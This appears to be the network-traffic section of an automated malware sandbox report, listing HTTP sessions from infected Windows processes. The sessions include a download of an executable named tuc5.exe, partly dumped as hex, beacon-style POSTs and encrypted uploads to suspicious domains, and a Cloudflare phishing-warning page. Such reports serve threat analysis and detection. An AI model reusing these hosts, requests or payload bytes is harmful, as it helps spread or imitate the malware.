                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72
                                                                                                                                                                                                                                                                                                                                Data Ascii: 1279<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.error
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778346062 CET1286INData Raw: 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: s.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { wi
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778403044 CET1286INData Raw: 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75
                                                                                                                                                                                                                                                                                                                                Data Ascii: al information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="4Eq
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778501034 CET1286INData Raw: 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22
                                                                                                                                                                                                                                                                                                                                Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">838d3b2f1f0d0975</strong></span> <span class="cf-footer-
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778544903 CET155INData Raw: 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: er --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.778594971 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.781881094 CET356OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Cookie: __cf_mw_byp=4Eqmux7qWYqWF5T9EAcIlgBVYAxQEOhYEz9MGlD6Xk0-1703131363-0-/api
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                Content-Length: 79
                                                                                                                                                                                                                                                                                                                                Host: diagramfiremonkeyowwa.fun
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:43.782027006 CET79OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4e 6d 4c 70 51 57 2d 2d 73 70 61 6d 32 26 6a 3d 37 64 39 38 36 35 32 64 65 64 38 35 31 35 65 62 34 31 32 34 63 35 33 33 61 36 37 31 63 37 61 61 26 76 65 72 3d 34 2e 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: act=recive_message&lid=NmLpQW--spam2&j=7d98652ded8515eb4124c533a671c7aa&ver=4.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:44.311300039 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:44 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=t6m15eceu1aej7fpu8gh270tk1; expires=Sun, 14-Apr-2024 21:49:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_show_country=1; expires=Mon, 19-Feb-2024 04:02:44 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_use_round=1; expires=Mon, 19-Feb-2024 04:02:44 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_round_n=2; expires=Mon, 19-Feb-2024 04:02:44 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6znP0rmqt1wIfYMLtQsK69eQxGlHgTalerMdEHYZL49OqxhfNWzMqxyQJ99Y0OT3Oz5jZeg2giKK1BAJM5%2F%2FWcBzj6Pq0wmvog77yq9DtBMejAQTFmAAFU0dqM6q5RT74Xu4EtqKsOITfCUJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b2
                                                                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:44.311433077 CET31INData Raw: 66 38 31 34 30 39 37 35 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: f8140975-MIAaerror #D12
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:44.311444044 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                9192.168.2.449755104.21.46.59802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:51.876221895 CET171OUTGET /order/tuc5.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Host: cream.hitsturbo.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346085072 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:02:52 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                Content-Length: 8459133
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=tuc5.exe
                                                                                                                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKiLrNaCnAK1m1EAg33oJr0UUAtEIUyCOIBS01HPhskEKauDz69ys2EWkaaLedfm%2FLvr08cSeU1LVNbDYqZNWH9LZEudwa5kXT%2F6GuFl9CkuejFgzyFU90urviJARARBI0RiFhfk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                CF-RAY: 838d3b628c1f8dc0-MIA
                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 ec b8 83 65 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7PELeF@@@@P,CODEd
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346106052 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 4c 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: `DATAL@BSSL.idataP@.tls.rdata@P.reloc
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346120119 CET1286INData Raw: 50 04 8b 08 89 0a 89 51 04 8b 15 38 c4 40 00 89 10 a3 38 c4 40 00 c3 53 56 57 55 51 8b f1 89 14 24 8b e8 8b 5d 00 8b 04 24 8b 10 89 16 8b 50 04 89 56 04 8b 3b 8b 43 08 8b d0 03 53 0c 3b 16 75 14 8b c3 e8 b7 ff ff ff 8b 43 08 89 06 8b 43 0c 01 46
                                                                                                                                                                                                                                                                                                                                Data Ascii: PQ8@8@SVWUQ$]$PV;CS;uCCFV;uCF;uUu3Z]_^[@SVWU2C;rlJk;w^;uBCB)C{uD5;r{;u)s&J$+|$+
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346184969 CET1286INData Raw: 0f 85 66 ff ff ff 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 da fc ff ff 8b 04 24 33 d2 89 10 eb 48 8b 6b 08 3b f5 75 3a 3b 7b 0c 7f 35 8b 0c 24 8b d7 8b c5 e8 71 fd ff ff 8b 04 24 83 38 00 74 28 8b 04 24 8b 40 04 01 43 08 8b 04 24 8b 40 04 29 43 0c
                                                                                                                                                                                                                                                                                                                                Data Ascii: fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$?4$;s[+L$L@]\$tL$T$&D$D$D$D$|$tT$L@3
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346215010 CET1057INData Raw: ea 02 a1 74 c4 40 00 8b 44 90 f4 85 c0 75 10 a1 74 c4 40 00 89 5c 90 f4 89 5b 04 89 1b eb 3a 8b 10 89 43 04 89 13 89 18 89 5a 04 eb 2c 81 fe 00 3c 00 00 7c 0d 8b d6 8b c7 e8 09 ff ff ff 84 c0 75 17 a1 68 c4 40 00 89 1d 68 c4 40 00 8b 10 89 43 04
                                                                                                                                                                                                                                                                                                                                Data Ascii: t@Dut@\[:CZ,<|uh@h@CZ_^[=l@~@=l@}@+l@p@p@3p@3l@SVW<$L$x@<\$u3R;s)GG
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346508026 CET1286INData Raw: e8 35 f1 ff ff c3 e9 af 0c 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3 18 c4 40 00 80 3d 15 c4 40 00 00 75 1f e8 9e f7 ff ff 84 c0 75 16 c7 05 18 c4 40 00 08 00 00 00 c7 45 fc 08 00 00 00 e9 61 01 00 00
                                                                                                                                                                                                                                                                                                                                Data Ascii: 5E_^[YY]@UQSVW3@=@uu@Ea3Uh"@d1d!=2@th@u@@%)@tEP|t@+;Pt@
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346524000 CET1286INData Raw: ca d9 da dc dd de df e0 e1 c3 8b c0 50 52 51 e8 f8 0a 00 00 83 b8 04 00 00 00 00 59 5a 58 75 01 c3 31 c0 e9 a4 ff ff ff c3 8d 40 00 50 e8 da 0a 00 00 8f 80 04 00 00 00 c3 8d 40 00 56 57 89 c6 89 d7 89 c8 39 f7 7f 13 74 2f c1 f9 02 78 2a f3 a5 89
                                                                                                                                                                                                                                                                                                                                Data Ascii: PRQYZXu1@P@VW9t/x*_^t|x_^UEPEk<fEk<1fUifU,@]7SVQt&9uENtHZ9u8Nu
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346700907 CET1286INData Raw: d0 fa ed 0e e8 65 e6 ff ff 83 c4 04 58 c3 80 3d 00 b0 40 00 01 76 09 50 ff 73 04 e9 da ff ff ff c3 90 80 3d 00 b0 40 00 01 76 07 50 53 e9 c8 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01
                                                                                                                                                                                                                                                                                                                                Data Ascii: eX=@vPs=@vPS@tA9t9uAA=@vPRQQTjjhYYZX=@vRTjjhZ=@vPRTjjhZX@D$@8PHt/0@
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346725941 CET1286INData Raw: 85 d2 0f 84 1c ff ff ff 89 d8 ff d2 85 c0 0f 84 10 ff ff ff 8b 53 0c e8 78 fb ff ff 8b 0d 00 c0 40 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 b1 0d 00 00 31 c0 c3 90 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 18 30
                                                                                                                                                                                                                                                                                                                                Data Ascii: Sx@tL$Q$11Edd@0@h@1@d9udt9u@j@@@4.@@S=@}!hj@ uS@P
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.346877098 CET1286INData Raw: 56 57 89 c3 8d 74 0a 0a 8b 7c 0a 06 8b 46 04 8b 16 01 d8 e8 92 00 00 00 83 c6 08 4f 7f ee 5f 5e 5b c3 53 56 57 89 c3 89 d6 89 cf 31 d2 8a 06 8a 56 01 80 f8 0a 74 19 80 f8 0c 74 2b 80 f8 0d 74 35 80 f8 0e 74 4c b0 02 5f 5e 5b e9 6a f0 ff ff 83 f9
                                                                                                                                                                                                                                                                                                                                Data Ascii: VWt|FO_^[SVW1Vtt+t5tL_^[jH?O0U\.L.T.O]U\.XO]_^[nSVWUuma}&jjhD$PSWjj
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:52.347079992 CET1286INData Raw: 8d 4c 24 04 51 52 ff 70 14 ff 30 e8 74 d7 ff ff 85 c0 74 04 33 c0 59 c3 e8 77 d7 ff ff eb f7 ff 30 c7 40 04 b0 d7 00 00 e8 ef d6 ff ff 48 75 01 c3 e8 5e d7 ff ff c3 56 8b f0 33 c0 89 46 0c 89 46 10 8b 46 04 2d b1 d7 00 00 74 0b 48 74 20 48 74 2e
                                                                                                                                                                                                                                                                                                                                Data Ascii: L$QRp0tt3Yw0@Hu^V3FFF-tHt Ht.IF(:@'@FR:@F$:@F O:@~HjhQjRPFHPa~Nj6]@-


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                10192.168.2.44975991.215.85.17803176C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:00.707166910 CET286OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://stualialuyastrelia.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 4431
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:00.707225084 CET4431OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 93 c1 0a d9
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j4A~;}f=BbOp&QD{jB+"m]it4JEBP5XO2a6/Dn{;j9@O 2'`ssf4Sy6U`A
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:01.005239010 CET599INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:00 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                11192.168.2.449764180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.730772972 CET284OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://wsrxxlaeilhke.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 364
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:14.730828047 CET364OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 41 df 9b
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA .[k,vudALbM%=.uVn$l+88fJ\#@]](Y2,/yBml[$.Thk{I4\oH(>93
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:15.729388952 CET253INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:15 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
